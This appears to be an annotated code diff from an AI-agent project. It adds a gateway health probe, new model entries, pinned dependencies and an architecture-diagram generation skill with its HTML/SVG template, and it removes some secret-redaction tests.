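    A zero exit status from the restart command only means the request was
    accepted, so liveness is checked separately after each attempt.
    """
    for _ in range(attempts):
        if not restart():
            return False  # the restart command itself failed
        time.sleep(settle_seconds)  # give a crashing process time to exit
        if is_active():
            return True
    return False
```

One difference from the diff: this sketch also stops if the retry's restart command fails. The diff ignores the retry's exit status and relies on `is-active` alone.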
+3
@@ -44,6 +44,7 @@ OPENROUTER_MODELS: list[tuple[str, str]] = [
("minimax/minimax-m2.7", ""),
("minimax/minimax-m2.5", ""),
("z-ai/glm-5.1", ""),
("z-ai/glm-5v-turbo", ""),
("z-ai/glm-5-turbo", ""),
("moonshotai/kimi-k2.5", ""),
("x-ai/grok-4.20", ""),
@@ -89,6 +90,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"minimax/minimax-m2.7",
"minimax/minimax-m2.5",
"z-ai/glm-5.1",
"z-ai/glm-5v-turbo",
"z-ai/glm-5-turbo",
"moonshotai/kimi-k2.5",
"x-ai/grok-4.20-beta",
@@ -134,6 +136,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"zai": [
"glm-5.1",
"glm-5",
"glm-5v-turbo",
"glm-5-turbo",
"glm-4.7",
"glm-4.5",
+73
@@ -13,6 +13,7 @@ import asyncio
import hmac
import json
import logging
import os
import secrets
import sys
import threading
@@ -319,12 +320,68 @@ class EnvVarReveal(BaseModel):
key: str
_GATEWAY_HEALTH_URL = os.getenv("GATEWAY_HEALTH_URL")
_GATEWAY_HEALTH_TIMEOUT = float(os.getenv("GATEWAY_HEALTH_TIMEOUT", "3"))
def _probe_gateway_health() -> tuple[bool, dict | None]:
"""Probe the gateway via its HTTP health endpoint (cross-container).
Uses ``/health/detailed`` first (returns full state), falling back to
the simpler ``/health`` endpoint. Returns ``(is_alive, body_dict)``.
Accepts any of these as ``GATEWAY_HEALTH_URL``:
- ``http://gateway:8642`` (base URL recommended)
- ``http://gateway:8642/health`` (explicit health path)
- ``http://gateway:8642/health/detailed`` (explicit detailed path)
This is a **blocking** call run via ``run_in_executor`` from async code.
"""
if not _GATEWAY_HEALTH_URL:
return False, None
# Normalise to base URL so we always probe the right paths regardless of
# whether the user included /health or /health/detailed in the env var.
base = _GATEWAY_HEALTH_URL.rstrip("/")
if base.endswith("/health/detailed"):
base = base[: -len("/health/detailed")]
elif base.endswith("/health"):
base = base[: -len("/health")]
for path in (f"{base}/health/detailed", f"{base}/health"):
try:
req = urllib.request.Request(path, method="GET")
with urllib.request.urlopen(req, timeout=_GATEWAY_HEALTH_TIMEOUT) as resp:
if resp.status == 200:
body = json.loads(resp.read())
return True, body
except Exception:
continue
return False, None
@app.get("/api/status")
async def get_status():
current_ver, latest_ver = check_config_version()
# --- Gateway liveness detection ---
# Try local PID check first (same-host). If that fails and a remote
# GATEWAY_HEALTH_URL is configured, probe the gateway over HTTP so the
# dashboard works when the gateway runs in a separate container.
gateway_pid = get_running_pid()
gateway_running = gateway_pid is not None
remote_health_body: dict | None = None
if not gateway_running and _GATEWAY_HEALTH_URL:
loop = asyncio.get_running_loop()
alive, remote_health_body = await loop.run_in_executor(
None, _probe_gateway_health
)
if alive:
gateway_running = True
# PID from the remote container (display only — not locally valid)
if remote_health_body:
gateway_pid = remote_health_body.get("pid")
gateway_state = None
gateway_platforms: dict = {}
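The normalisation step in `_probe_gateway_health` maps all three accepted forms of `GATEWAY_HEALTH_URL` to the same pair of probe URLs, with the detailed endpoint first. Below is a standalone sketch of just that step. The helper name `health_probe_urls` is hypothetical.

```python
def health_probe_urls(configured: str) -> list[str]:
    """Return the URLs to try, detailed endpoint first, for a GATEWAY_HEALTH_URL value."""
    base = configured.rstrip("/")
    # Strip at most one known suffix so base always ends up as scheme://host:port.
    for suffix in ("/health/detailed", "/health"):
        if base.endswith(suffix):
            base = base[: -len(suffix)]
            break
    return [f"{base}/health/detailed", f"{base}/health"]


print(health_probe_urls("http://gateway:8642/health"))
# ['http://gateway:8642/health/detailed', 'http://gateway:8642/health']
```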
@@ -341,7 +398,12 @@ async def get_status():
except Exception:
configured_gateway_platforms = None
# Prefer the detailed health endpoint response (has full state) when the
# local runtime status file is absent or stale (cross-container).
runtime = read_runtime_status()
if runtime is None and remote_health_body and remote_health_body.get("gateway_state"):
runtime = remote_health_body
if runtime:
gateway_state = runtime.get("gateway_state")
gateway_platforms = runtime.get("platforms") or {}
@@ -356,6 +418,17 @@ async def get_status():
if not gateway_running:
gateway_state = gateway_state if gateway_state in ("stopped", "startup_failed") else "stopped"
gateway_platforms = {}
elif gateway_running and remote_health_body is not None:
# The health probe confirmed the gateway is alive, but the local
# runtime status file may be stale (cross-container). Override
# stopped/None state so the dashboard shows the correct badge.
if gateway_state in (None, "stopped"):
gateway_state = "running"
# If there was no runtime info at all but the health probe confirmed alive,
# ensure we still report the gateway as running (no shared volume scenario).
if gateway_running and gateway_state is None and remote_health_body is not None:
gateway_state = "running"
active_sessions = 0
try:
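The `/api/status` changes reconcile two sources of truth. The local runtime status file may be stale or missing across containers, while the remote health probe may confirm that the gateway is alive. Below is a simplified sketch of the resulting badge logic. The function `reconcile_gateway_state` is hypothetical, and it folds the "no runtime info" case into `local_state=None`.

```python
from typing import Optional


def reconcile_gateway_state(local_state: Optional[str], running: bool,
                            remote_probe_ok: bool) -> Optional[str]:
    """Pick the dashboard state from local runtime info and the remote health probe."""
    if not running:
        # Keep a meaningful terminal state; anything else is reported as stopped.
        return local_state if local_state in ("stopped", "startup_failed") else "stopped"
    if remote_probe_ok and local_state in (None, "stopped"):
        # A stale or missing local status file must not hide a live remote gateway.
        return "running"
    return local_state
```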
+3 -3
@@ -78,13 +78,13 @@ dingtalk = ["dingtalk-stream>=0.1.0,<1"]
feishu = ["lark-oapi>=1.5.3,<2"]
web = ["fastapi>=0.104.0,<1", "uvicorn[standard]>=0.24.0,<1"]
rl = [
"atroposlib @ git+https://github.com/NousResearch/atropos.git",
"tinker @ git+https://github.com/thinking-machines-lab/tinker.git",
"atroposlib @ git+https://github.com/NousResearch/atropos.git@c20c85256e5a45ad31edf8b7276e9c5ee1995a30",
"tinker @ git+https://github.com/thinking-machines-lab/tinker.git@30517b667f18a3dfb7ef33fb56cf686d5820ba2b",
"fastapi>=0.104.0,<1",
"uvicorn[standard]>=0.24.0,<1",
"wandb>=0.15.0,<1",
]
yc-bench = ["yc-bench @ git+https://github.com/collinear-ai/yc-bench.git ; python_version >= '3.12'"]
yc-bench = ["yc-bench @ git+https://github.com/collinear-ai/yc-bench.git@bfb0c88062450f46341bd9a5298903fc2e952a5c ; python_version >= '3.12'"]
all = [
"hermes-agent[modal]",
"hermes-agent[daytona]",
+1
@@ -62,6 +62,7 @@ AUTHOR_MAP = {
"258577966+voidborne-d@users.noreply.github.com": "voidborne-d",
"70424851+insecurejezza@users.noreply.github.com": "insecurejezza",
"259807879+Bartok9@users.noreply.github.com": "Bartok9",
"268667990+Roy-oss1@users.noreply.github.com": "Roy-oss1",
# contributors (manual mapping from git names)
"dmayhem93@gmail.com": "dmahan93",
"samherring99@gmail.com": "samherring99",
+1 -1
@@ -8,7 +8,7 @@
"start": "node bridge.js"
},
"dependencies": {
"@whiskeysockets/baileys": "WhiskeySockets/Baileys#fix/abprops-abt-fetch",
"@whiskeysockets/baileys": "WhiskeySockets/Baileys#01047debd81beb20da7b7779b08edcb06aa03770",
"express": "^4.21.0",
"qrcode-terminal": "^0.12.0",
"pino": "^9.0.0"
@@ -0,0 +1,129 @@
---
name: architecture-diagram
description: Generate professional dark-themed system architecture diagrams as standalone HTML/SVG files. Self-contained output with no external dependencies. Based on Cocoon AI's architecture-diagram-generator (MIT).
version: 1.0.0
author: Cocoon AI (hello@cocoon-ai.com), ported by Hermes Agent
license: MIT
dependencies: []
metadata:
hermes:
tags: [architecture, diagrams, SVG, HTML, visualization, infrastructure, cloud]
related_skills: [excalidraw]
---
# Architecture Diagram Skill
Generate professional, dark-themed technical architecture diagrams as standalone HTML files with inline SVG graphics. No external tools, no API keys, no rendering libraries — just write the HTML file and open it in a browser.
Based on [Cocoon AI's architecture-diagram-generator](https://github.com/Cocoon-AI/architecture-diagram-generator) (MIT).
## Workflow
1. User describes their system architecture (components, connections, technologies)
2. Generate the HTML file following the design system below
3. Save with `write_file` to a `.html` file (e.g. `~/architecture-diagram.html`)
4. User opens it in any browser; it works offline (without network access, JetBrains Mono falls back to the browser's default monospace font)
### Output Location
Save diagrams to a user-specified path, or default to the current working directory:
```
./[project-name]-architecture.html
```
### Preview
After saving, suggest the user open it:
```bash
# macOS
open ./my-architecture.html
# Linux
xdg-open ./my-architecture.html
```
## Design System & Visual Language
### Color Palette (Semantic Mapping)
Use specific `rgba` fills and hex strokes to categorize components:
| Component Type | Fill (rgba) | Stroke (Hex) |
| :--- | :--- | :--- |
| **Frontend** | `rgba(8, 51, 68, 0.4)` | `#22d3ee` (cyan-400) |
| **Backend** | `rgba(6, 78, 59, 0.4)` | `#34d399` (emerald-400) |
| **Database** | `rgba(76, 29, 149, 0.4)` | `#a78bfa` (violet-400) |
| **AWS/Cloud** | `rgba(120, 53, 15, 0.3)` | `#fbbf24` (amber-400) |
| **Security** | `rgba(136, 19, 55, 0.4)` | `#fb7185` (rose-400) |
| **Message Bus** | `rgba(251, 146, 60, 0.3)` | `#fb923c` (orange-400) |
| **External** | `rgba(30, 41, 59, 0.5)` | `#94a3b8` (slate-400) |
### Typography & Background
- **Font:** JetBrains Mono (Monospace), loaded from Google Fonts
- **Sizes:** 12px (Names), 9px (Sublabels), 8px (Annotations), 7px (Tiny labels)
- **Background:** Slate-950 (`#020617`) with a subtle 40px grid pattern
```svg
<!-- Background Grid Pattern -->
<pattern id="grid" width="40" height="40" patternUnits="userSpaceOnUse">
<path d="M 40 0 L 0 0 0 40" fill="none" stroke="#1e293b" stroke-width="0.5"/>
</pattern>
```
## Technical Implementation Details
### Component Rendering
Components are rounded rectangles (`rx="6"`) with 1.5px strokes. To prevent arrows from showing through semi-transparent fills, use a **double-rect masking technique**:
1. Draw an opaque background rect (`#0f172a`)
2. Draw the semi-transparent styled rect on top
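The Python helper below sketches the double-rect technique by emitting one component as SVG markup. The helper name and its parameters are illustrative assumptions. The coordinates, colours, and text offsets in the example call reproduce the template's API Server component.

```python
from xml.sax.saxutils import escape


def component_svg(x: int, y: int, w: int, h: int, fill: str, stroke: str,
                  name: str, sublabel: str = "") -> str:
    """Return SVG markup for one component using double-rect masking."""
    cx = x + w // 2  # horizontal centre for text-anchor="middle"
    parts = [
        # 1. Opaque backing rect: hides any arrow passing underneath.
        f'<rect x="{x}" y="{y}" width="{w}" height="{h}" rx="6" fill="#0f172a"/>',
        # 2. Semi-transparent styled rect on top carries the category colours.
        f'<rect x="{x}" y="{y}" width="{w}" height="{h}" rx="6" '
        f'fill="{fill}" stroke="{stroke}" stroke-width="1.5"/>',
        f'<text x="{cx}" y="{y + 20}" fill="white" font-size="11" '
        f'font-weight="600" text-anchor="middle">{escape(name)}</text>',
    ]
    if sublabel:
        parts.append(
            f'<text x="{cx}" y="{y + 36}" fill="#94a3b8" font-size="9" '
            f'text-anchor="middle">{escape(sublabel)}</text>'
        )
    return "\n".join(parts)


print(component_svg(510, 280, 110, 50, "rgba(6, 78, 59, 0.4)", "#34d399",
                    "API Server", "FastAPI :8000"))
```

Escaping the labels keeps names such as `R&D` from producing invalid SVG.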
### Connection Rules
- **Z-Order:** Draw arrows *early* in the SVG (after the grid) so they render behind component boxes
- **Arrowheads:** Defined via SVG markers
- **Security Flows:** Use dashed lines in rose color (`#fb7185`)
- **Boundaries:**
- *Security Groups:* Dashed (`4,4`), rose color
- *Regions:* Large dashed (`8,4`), amber color, `rx="12"`
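Below is a matching sketch for arrows. It assumes the `arrowhead` marker id from the template's `<defs>` and the template's `5,5` dash pattern for auth flows. The function name `arrow_svg` is hypothetical.

```python
AUTH_FLOW_DASH = "5,5"  # dash pattern used by the template's curved auth path


def arrow_svg(x1: float, y1: float, x2: float, y2: float, stroke: str = "#64748b",
              dashed: bool = False, marker_id: str = "arrowhead") -> str:
    """Return a straight arrow; emit it before the component rects so it sits behind them."""
    dash = f' stroke-dasharray="{AUTH_FLOW_DASH}"' if dashed else ""
    return (
        f'<line x1="{x1}" y1="{y1}" x2="{x2}" y2="{y2}" stroke="{stroke}" '
        f'stroke-width="1.5"{dash} marker-end="url(#{marker_id})"/>'
    )


# Security/auth flow: rose stroke, dashed
print(arrow_svg(80, 140, 80, 200, stroke="#fb7185", dashed=True))
```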
### Spacing & Layout Logic
- **Standard Height:** 60px (Services); 80-120px (Large components)
- **Vertical Gap:** Minimum 40px between components
- **Message Buses:** Must be placed *in the gap* between services, not overlapping them
- **Legend Placement:** **CRITICAL.** Must be placed outside all boundary boxes. Find the bottom edge of every boundary (its `y + height`, since SVG's y axis grows downward), take the largest, and place the legend at least 20px below it.
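The sketch below applies the legend placement rule to boundaries given as `(x, y, width, height)` tuples. The helper `legend_y` is hypothetical.

```python
def legend_y(boundaries: list[tuple[float, float, float, float]], margin: float = 20) -> float:
    """Return the legend's top y, at least `margin` px below every boundary box."""
    if not boundaries:
        return margin
    # y grows downward in SVG, so each box's bottom edge is y + height.
    return max(y + h for _x, y, _w, h in boundaries) + margin
```

For the template's region boundary (`y="40"`, `height="620"`), this returns 680. That equals the full height of the template's `viewBox="0 0 1000 680"`, so the viewBox must be extended to fit a legend placed there.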
## Document Structure
The generated HTML file follows a four-part layout:
1. **Header:** Title with a pulsing dot indicator and subtitle
2. **Main SVG:** The diagram contained within a rounded border card
3. **Summary Cards:** A grid of three cards below the diagram for high-level details
4. **Footer:** Minimal metadata
### Info Card Pattern
```html
<div class="card">
<div class="card-header">
<div class="card-dot cyan"></div>
<h3>Title</h3>
</div>
<ul>
<li>• Item one</li>
<li>• Item two</li>
</ul>
</div>
```
## Output Requirements
- **Single File:** One self-contained `.html` file
- **No External Dependencies:** All CSS and SVG must be inline (except Google Fonts)
- **No JavaScript:** Use pure CSS for any animations (like pulsing dots)
- **Compatibility:** Must render correctly in any modern web browser
## Template Reference
Load the full HTML template for the exact structure, CSS, and SVG component examples:
```
skill_view(name="architecture-diagram", file_path="templates/template.html")
```
The template contains working examples of every component type (frontend, backend, database, cloud, security), arrow styles (standard, dashed, curved), security groups, region boundaries, and the legend — use it as your structural reference when generating diagrams.
@@ -0,0 +1,319 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>[PROJECT NAME] Architecture Diagram</title>
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;500;600;700&display=swap" rel="stylesheet">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'JetBrains Mono', monospace;
background: #020617;
min-height: 100vh;
padding: 2rem;
color: white;
}
.container {
max-width: 1200px;
margin: 0 auto;
}
.header {
margin-bottom: 2rem;
}
.header-row {
display: flex;
align-items: center;
gap: 1rem;
margin-bottom: 0.5rem;
}
.pulse-dot {
width: 12px;
height: 12px;
background: #22d3ee;
border-radius: 50%;
animation: pulse 2s infinite;
}
@keyframes pulse {
0%, 100% { opacity: 1; }
50% { opacity: 0.5; }
}
h1 {
font-size: 1.5rem;
font-weight: 700;
letter-spacing: -0.025em;
}
.subtitle {
color: #94a3b8;
font-size: 0.875rem;
margin-left: 1.75rem;
}
.diagram-container {
background: rgba(15, 23, 42, 0.5);
border-radius: 1rem;
border: 1px solid #1e293b;
padding: 1.5rem;
overflow-x: auto;
}
svg {
width: 100%;
min-width: 900px;
display: block;
}
.cards {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
gap: 1rem;
margin-top: 2rem;
}
.card {
background: rgba(15, 23, 42, 0.5);
border-radius: 0.75rem;
border: 1px solid #1e293b;
padding: 1.25rem;
}
.card-header {
display: flex;
align-items: center;
gap: 0.5rem;
margin-bottom: 0.75rem;
}
.card-dot {
width: 8px;
height: 8px;
border-radius: 50%;
}
.card-dot.cyan { background: #22d3ee; }
.card-dot.emerald { background: #34d399; }
.card-dot.violet { background: #a78bfa; }
.card-dot.amber { background: #fbbf24; }
.card-dot.rose { background: #fb7185; }
.card h3 {
font-size: 0.875rem;
font-weight: 600;
}
.card ul {
list-style: none;
color: #94a3b8;
font-size: 0.75rem;
}
.card li {
margin-bottom: 0.375rem;
}
.footer {
text-align: center;
margin-top: 1.5rem;
color: #475569;
font-size: 0.75rem;
}
</style>
</head>
<body>
<div class="container">
<!-- Header -->
<div class="header">
<div class="header-row">
<div class="pulse-dot"></div>
<h1>[PROJECT NAME] Architecture</h1>
</div>
<p class="subtitle">[Subtitle description]</p>
</div>
<!-- Main Diagram -->
<div class="diagram-container">
<svg viewBox="0 0 1000 680">
<!-- Definitions -->
<defs>
<marker id="arrowhead" markerWidth="10" markerHeight="7" refX="9" refY="3.5" orient="auto">
<polygon points="0 0, 10 3.5, 0 7" fill="#64748b" />
</marker>
<pattern id="grid" width="40" height="40" patternUnits="userSpaceOnUse">
<path d="M 40 0 L 0 0 0 40" fill="none" stroke="#1e293b" stroke-width="0.5"/>
</pattern>
</defs>
<!-- Background Grid -->
<rect width="100%" height="100%" fill="url(#grid)" />
<!-- =================================================================
COMPONENT EXAMPLES - Copy and customize these patterns
================================================================= -->
<!-- External/Generic Component -->
<rect x="30" y="280" width="100" height="50" rx="6" fill="rgba(30, 41, 59, 0.5)" stroke="#94a3b8" stroke-width="1.5"/>
<text x="80" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">Users</text>
<text x="80" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">Browser/Mobile</text>
<!-- Security Component -->
<rect x="30" y="80" width="100" height="60" rx="6" fill="rgba(136, 19, 55, 0.4)" stroke="#fb7185" stroke-width="1.5"/>
<text x="80" y="105" fill="white" font-size="11" font-weight="600" text-anchor="middle">Auth Provider</text>
<text x="80" y="121" fill="#94a3b8" font-size="9" text-anchor="middle">OAuth 2.0</text>
<!-- Region/Cloud Boundary -->
<rect x="160" y="40" width="820" height="620" rx="12" fill="rgba(251, 191, 36, 0.05)" stroke="#fbbf24" stroke-width="1" stroke-dasharray="8,4"/>
<text x="172" y="58" fill="#fbbf24" font-size="10" font-weight="600">AWS Region: us-west-2</text>
<!-- AWS/Cloud Service -->
<rect x="200" y="280" width="110" height="50" rx="6" fill="rgba(120, 53, 15, 0.3)" stroke="#fbbf24" stroke-width="1.5"/>
<text x="255" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">CloudFront</text>
<text x="255" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">CDN</text>
<!-- Multi-line AWS Component (S3 Buckets example) -->
<rect x="200" y="380" width="110" height="100" rx="6" fill="rgba(120, 53, 15, 0.3)" stroke="#fbbf24" stroke-width="1.5"/>
<text x="255" y="400" fill="white" font-size="11" font-weight="600" text-anchor="middle">S3 Buckets</text>
<text x="255" y="420" fill="#94a3b8" font-size="8" text-anchor="middle">• bucket-one</text>
<text x="255" y="434" fill="#94a3b8" font-size="8" text-anchor="middle">• bucket-two</text>
<text x="255" y="448" fill="#94a3b8" font-size="8" text-anchor="middle">• bucket-three</text>
<text x="255" y="466" fill="#fbbf24" font-size="7" text-anchor="middle">OAI Protected</text>
<!-- Security Group (dashed boundary) -->
<rect x="350" y="265" width="120" height="80" rx="8" fill="transparent" stroke="#fb7185" stroke-width="1" stroke-dasharray="4,4"/>
<text x="358" y="279" fill="#fb7185" font-size="8">sg-name :port</text>
<!-- Component inside security group -->
<rect x="360" y="280" width="100" height="50" rx="6" fill="rgba(120, 53, 15, 0.3)" stroke="#fbbf24" stroke-width="1.5"/>
<text x="410" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">Load Balancer</text>
<text x="410" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">HTTPS :443</text>
<!-- Backend Component -->
<rect x="510" y="280" width="110" height="50" rx="6" fill="rgba(6, 78, 59, 0.4)" stroke="#34d399" stroke-width="1.5"/>
<text x="565" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">API Server</text>
<text x="565" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">FastAPI :8000</text>
<!-- Database Component -->
<rect x="700" y="280" width="120" height="50" rx="6" fill="rgba(76, 29, 149, 0.4)" stroke="#a78bfa" stroke-width="1.5"/>
<text x="760" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">Database</text>
<text x="760" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">PostgreSQL</text>
<!-- Frontend Component -->
<rect x="200" y="520" width="200" height="110" rx="8" fill="rgba(8, 51, 68, 0.4)" stroke="#22d3ee" stroke-width="1.5"/>
<text x="300" y="545" fill="white" font-size="12" font-weight="600" text-anchor="middle">Frontend</text>
<text x="300" y="565" fill="#94a3b8" font-size="9" text-anchor="middle">React + TypeScript</text>
<text x="300" y="580" fill="#94a3b8" font-size="9" text-anchor="middle">Additional detail</text>
<text x="300" y="595" fill="#94a3b8" font-size="9" text-anchor="middle">More info</text>
<text x="300" y="615" fill="#22d3ee" font-size="8" text-anchor="middle">domain.example.com</text>
<!-- =================================================================
ARROW EXAMPLES
================================================================= -->
<!-- Standard arrow with label -->
<line x1="130" y1="305" x2="198" y2="305" stroke="#22d3ee" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<text x="164" y="299" fill="#94a3b8" font-size="9" text-anchor="middle">HTTPS</text>
<!-- Simple arrow (no label) -->
<line x1="310" y1="305" x2="358" y2="305" stroke="#22d3ee" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<!-- Vertical arrow -->
<line x1="255" y1="330" x2="255" y2="378" stroke="#fbbf24" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<text x="270" y="358" fill="#94a3b8" font-size="9">OAI</text>
<!-- Service-to-service arrows (solid) -->
<line x1="460" y1="305" x2="508" y2="305" stroke="#34d399" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<line x1="620" y1="305" x2="698" y2="305" stroke="#a78bfa" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<text x="655" y="299" fill="#94a3b8" font-size="9">TLS</text>
<!-- Curved path for auth flow -->
<path d="M 80 140 L 80 200 Q 80 220 100 220 L 200 220 Q 220 220 220 240 L 220 278" fill="none" stroke="#fb7185" stroke-width="1.5" stroke-dasharray="5,5"/>
<text x="150" y="210" fill="#fb7185" font-size="8">JWT + PKCE</text>
<!-- =================================================================
LEGEND
================================================================= -->
<text x="720" y="70" fill="white" font-size="10" font-weight="600">Legend</text>
<rect x="720" y="82" width="16" height="10" rx="2" fill="rgba(8, 51, 68, 0.4)" stroke="#22d3ee" stroke-width="1"/>
<text x="742" y="90" fill="#94a3b8" font-size="8">Frontend</text>
<rect x="720" y="98" width="16" height="10" rx="2" fill="rgba(6, 78, 59, 0.4)" stroke="#34d399" stroke-width="1"/>
<text x="742" y="106" fill="#94a3b8" font-size="8">Backend</text>
<rect x="720" y="114" width="16" height="10" rx="2" fill="rgba(120, 53, 15, 0.3)" stroke="#fbbf24" stroke-width="1"/>
<text x="742" y="122" fill="#94a3b8" font-size="8">Cloud Service</text>
<rect x="720" y="130" width="16" height="10" rx="2" fill="rgba(76, 29, 149, 0.4)" stroke="#a78bfa" stroke-width="1"/>
<text x="742" y="138" fill="#94a3b8" font-size="8">Database</text>
<rect x="720" y="146" width="16" height="10" rx="2" fill="rgba(136, 19, 55, 0.4)" stroke="#fb7185" stroke-width="1"/>
<text x="742" y="154" fill="#94a3b8" font-size="8">Security</text>
<line x1="720" y1="168" x2="736" y2="168" stroke="#fb7185" stroke-width="1" stroke-dasharray="3,3"/>
<text x="742" y="171" fill="#94a3b8" font-size="8">Auth Flow</text>
<rect x="720" y="178" width="16" height="10" rx="2" fill="transparent" stroke="#fb7185" stroke-width="1" stroke-dasharray="3,3"/>
<text x="742" y="186" fill="#94a3b8" font-size="8">Security Group</text>
</svg>
</div>
<!-- Info Cards -->
<div class="cards">
<div class="card">
<div class="card-header">
<div class="card-dot rose"></div>
<h3>Card Title 1</h3>
</div>
<ul>
<li>• Item one</li>
<li>• Item two</li>
<li>• Item three</li>
<li>• Item four</li>
</ul>
</div>
<div class="card">
<div class="card-header">
<div class="card-dot amber"></div>
<h3>Card Title 2</h3>
</div>
<ul>
<li>• Item one</li>
<li>• Item two</li>
<li>• Item three</li>
<li>• Item four</li>
</ul>
</div>
<div class="card">
<div class="card-header">
<div class="card-dot violet"></div>
<h3>Card Title 3</h3>
</div>
<ul>
<li>• Item one</li>
<li>• Item two</li>
<li>• Item three</li>
<li>• Item four</li>
</ul>
</div>
</div>
<!-- Footer -->
<p class="footer">
[Project Name] • [Additional metadata]
</p>
</div>
</body>
</html>
-80
@@ -781,83 +781,3 @@ class TestTokenBudgetTailProtection:
# Tool at index 2 is outside the protected tail (last 3 = indices 2,3,4)
# so it might or might not be pruned depending on boundary
assert isinstance(pruned, int)
class TestSerializeRedactsSecrets:
"""Verify that _serialize_for_summary strips secrets before they reach the summarizer LLM."""
def _make_compressor(self):
with patch("agent.context_compressor.get_model_context_length", return_value=100000):
return ContextCompressor(model="test", quiet_mode=True)
def test_redacts_api_key_in_tool_result(self):
c = self._make_compressor()
turns = [{"role": "tool", "content": "OPENAI_API_KEY=sk-proj-abc123def456ghi789jkl012", "tool_call_id": "tc1"}]
result = c._serialize_for_summary(turns)
assert "abc123def456" not in result
assert "sk-proj" not in result
def test_redacts_api_key_in_user_message(self):
c = self._make_compressor()
turns = [{"role": "user", "content": "My key is sk-proj-abc123def456ghi789jkl012"}]
result = c._serialize_for_summary(turns)
assert "abc123def456" not in result
def test_redacts_secret_in_tool_call_arguments(self):
c = self._make_compressor()
turns = [{
"role": "assistant",
"content": "",
"tool_calls": [{
"function": {
"name": "bash",
"arguments": '{"command": "export OPENAI_API_KEY=sk-proj-abc123def456ghi789jkl012"}',
},
}],
}]
result = c._serialize_for_summary(turns)
assert "abc123def456" not in result
def test_redacts_github_pat_in_assistant_content(self):
c = self._make_compressor()
turns = [{"role": "assistant", "content": "Found token: ghp_abcdef1234567890abcdef1234567890abcd"}]
result = c._serialize_for_summary(turns)
assert "abcdef1234567890" not in result
def test_preserves_non_secret_content(self):
c = self._make_compressor()
turns = [
{"role": "user", "content": "Please fix the bug in src/main.py"},
{"role": "assistant", "content": "I found the issue on line 42."},
]
result = c._serialize_for_summary(turns)
assert "src/main.py" in result
assert "line 42" in result
class TestGenerateSummaryRedactsOutput:
"""Verify that _generate_summary redacts the summarizer LLM's output."""
def test_summary_output_is_redacted(self):
"""If the summarizer LLM echoes a secret despite instructions, it gets redacted."""
mock_response = MagicMock()
mock_response.choices = [MagicMock()]
mock_response.choices[0].message.content = (
"## Goal\nDeploy app.\n## Critical Context\n"
"User's API key: sk-proj-abc123def456ghi789jkl012"
)
with patch("agent.context_compressor.get_model_context_length", return_value=100000):
c = ContextCompressor(model="test", quiet_mode=True)
messages = [
{"role": "user", "content": "deploy my app"},
{"role": "assistant", "content": "deploying now"},
]
with patch("agent.context_compressor.call_llm", return_value=mock_response):
summary = c._generate_summary(messages)
assert "abc123def456" not in summary
# Also verify _previous_summary is redacted (iterative update path)
assert "abc123def456" not in (c._previous_summary or "")
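This hunk deletes the two redaction test classes (the file stat reads -80), but while they existed they described a clear contract. Recognizable credential shapes, such as OpenAI-style `sk-proj-` keys in tool results, user messages, or tool-call arguments, and GitHub `ghp_` tokens, must be gone from the serialized transcript. Ordinary text like `src/main.py` must survive. Below is a minimal regex-based sketch of that contract. The names `redact_secrets` and `serialize_for_summary` and both patterns are assumptions for illustration. They do not reproduce the project's redaction rules.

```python
import re

# Hypothetical patterns; a real redactor would cover many more token shapes.
_SECRET_PATTERNS = [
    re.compile(r"sk-[A-Za-z0-9_-]{16,}"),  # OpenAI-style keys, including sk-proj-...
    re.compile(r"ghp_[A-Za-z0-9]{36,}"),   # GitHub classic personal access tokens
]


def redact_secrets(text: str, placeholder: str = "[REDACTED]") -> str:
    """Replace every substring that matches a known secret pattern."""
    for pattern in _SECRET_PATTERNS:
        text = pattern.sub(placeholder, text)
    return text


def serialize_for_summary(turns: list[dict]) -> str:
    """Flatten chat turns (content plus tool-call arguments), then redact."""
    lines = []
    for turn in turns:
        lines.append(f"[{turn['role']}] {turn.get('content') or ''}")
        for call in turn.get("tool_calls") or []:
            fn = call.get("function", {})
            lines.append(f"  tool_call {fn.get('name')}: {fn.get('arguments', '')}")
    # Redacting the joined text covers content and arguments in one pass.
    return redact_secrets("\n".join(lines))
```

Redacting once, after serialization, means new fields added to the transcript later are still covered.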
+6
@@ -93,6 +93,12 @@ def make_restart_runner(
runner._running_agent_count = GatewayRunner._running_agent_count.__get__(
runner, GatewayRunner
)
runner._snapshot_running_agents = GatewayRunner._snapshot_running_agents.__get__(
runner, GatewayRunner
)
runner._notify_active_sessions_of_shutdown = (
GatewayRunner._notify_active_sessions_of_shutdown.__get__(runner, GatewayRunner)
)
runner._launch_detached_restart_command = GatewayRunner._launch_detached_restart_command.__get__(
runner, GatewayRunner
)
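`make_restart_runner` attaches real `GatewayRunner` methods to its test runner by calling each function's descriptor method, `GatewayRunner.<method>.__get__(runner, GatewayRunner)`. This returns a method bound to `runner`. The standalone sketch below shows the same trick. `RealRunner` and `StubRunner` are made-up classes used only for illustration.

```python
class RealRunner:
    def __init__(self):
        self._running_agents = {"a": object(), "b": object()}

    def _running_agent_count(self) -> int:
        return len(self._running_agents)


class StubRunner:
    """Bare object that never runs RealRunner.__init__."""


stub = StubRunner()
stub._running_agents = {"only": object()}

# Plain functions are descriptors: __get__(instance, owner) returns a method
# bound to `stub`, so the real implementation runs against the stub's state.
stub._running_agent_count = RealRunner._running_agent_count.__get__(stub, RealRunner)
```

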